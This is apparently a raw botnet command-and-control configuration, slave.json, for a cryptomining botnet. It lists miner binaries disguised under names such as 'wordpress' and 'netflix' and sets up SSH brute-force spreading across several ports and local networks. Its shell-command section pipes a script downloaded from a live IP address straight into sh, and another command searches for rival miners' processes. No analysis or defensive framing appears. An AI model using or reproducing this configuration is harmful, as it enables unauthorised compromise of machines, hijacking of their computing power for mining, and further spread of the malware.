slave.json
{
"Data": {
"CfgVer":66,
"Config":{
"Interval":"60s"
},
"Miner":[
{
"Exe":"/usr/local/bin/wordpress",
"Md5":"d146612bed765ba32200e0f97d0330c8",
"Url":"/static/wordpress"
},
{
"Exe":"/usr/bin/wordpress",
"Md5":"d146612bed765ba32200e0f97d0330c8",
"Url":"/static/wordpress"
},
{
"Exe":"/tmp/netflix",
"Md5":"8ccb87dcbcaea2b3d0af7c7a89acb5e9",
"Url":"/static/netflix"
}
],
"Cmd":{
"AALocalSSH":{
"Id":3035,
"Version":5023,
"UrlPath":"/static/5023/ddgs",
"Timeout":"1m"
},
"AAssh":{
"Id":2147,
"Version":5023,
"UrlPath":"/static/5023/ddgs",
"NThreads":100,
"Duration":"480h",
"IPDuration":"12h",
"GenLan":True,
"GenAAA":False,
"Timeout":"1m",
"Ports":[
22,
1987,
2222,
22222,
12222
]
},
"Sh":[
{
"Id":952,
"Version":4005,
"Line":"(curl -fsSL http://67.205.168.20:8000/i.sh||wget -q -O- http://67.205.168.20:8000/i.sh) | sh",
"Timeout":"120s"
},
{
"Id":953,
"Version":5018,
"Line":"(curl -fsSL http://67.205.168.20:8000/i.sh||wget -q -O- http://67.205.168.20:8000/i.sh) | sh",
"Timeout":"120s"
},
{
"Id":951,
"Version":-1,
"Line":"ps auxf|grep -v grep|grep \"\\(Trump\\|Macron\\|hwloc\\|Italia\\)\"",
"Timeout":"120s"
}
]
}
},
"Signature": "\x25\x1D\x17\xEA\x42\x83\x7B\x80\x56\xE9\x0A\xDF\xF8\xC9\xF9\xCC\xF6\x94\x7C\x91\x7F\x59\xDD\xA2\x75\x29\x41\x46\x86\xC6\xF7\x94\xA9\xB7\x42\x0A\x66\x94\xA8\xE7\x17\x76\x0A\xAF\xD7\x3F\x5E\x62\x11\xF3\xDE\x74\x6F\x0A\xBC\x77\x5A\xCB\x7F\x84\x3A\x04\x3F\xC2\xD3\x00\xDF\xE2\x99\xD0\x9C\xB7\x89\x9F\x8B\x26\xBA\xE3\x55\xD6\xFD\x9F\xF7\x5F\xB8\x20\x6D\x76\x67\x10\xED\x89\xA4\x3D\x38\xF0\xD8\x99\x1C\xE0\xA5\x92\x90\x15\x33\xA6\x44\xBA\x04\xB9\xAD\x60\x08\xF8\x97\xF8\xEF\xFA\x5E\xC6\x25\x3F\xE6\x39\x83\x9A\xAF\xC1\x08\x12\xE6\xF8\x01\x87\x68\x47\xF4\x37\x9A\x8A\x20\xC6\x73\x44\xB5\x26\x30\x71\x9E\x2B\x30\xBB\xDC\x7B\xB9\xAA\x3E\xC0\x11\x17\xB4\x7E\x37\xA7\xAC\xF6\x85\x1A\x85\x6E\x36\x9C\x51\x10\x7B\x54\x7C\xAB\xB8\xFE\xE0\xE3\xFE\x79\x30\x70\x31\x39\xA0\xA9\x84\x6D\xA6\x0C\x33\x66\x8C\xAD\xBF\x54\xC5\xC9\x20\xB4\x4C\xB2\x06\x34\x71\x23\xCD\x4F\x6E\x5E\xD1\x40\x12\x18\xED\x85\x0A\xA6\x7B\x62\x09\x5E\x05\x0A\x68\xDC\xED\xD9\x57\xDC\xD4\x2B\xDC\xCD\xF0\x04\x03\x72\x23\x1A\x39\x98\x42\x3F\x33\xF7\x15\x31\xA8\xE6\xF2\x13"
}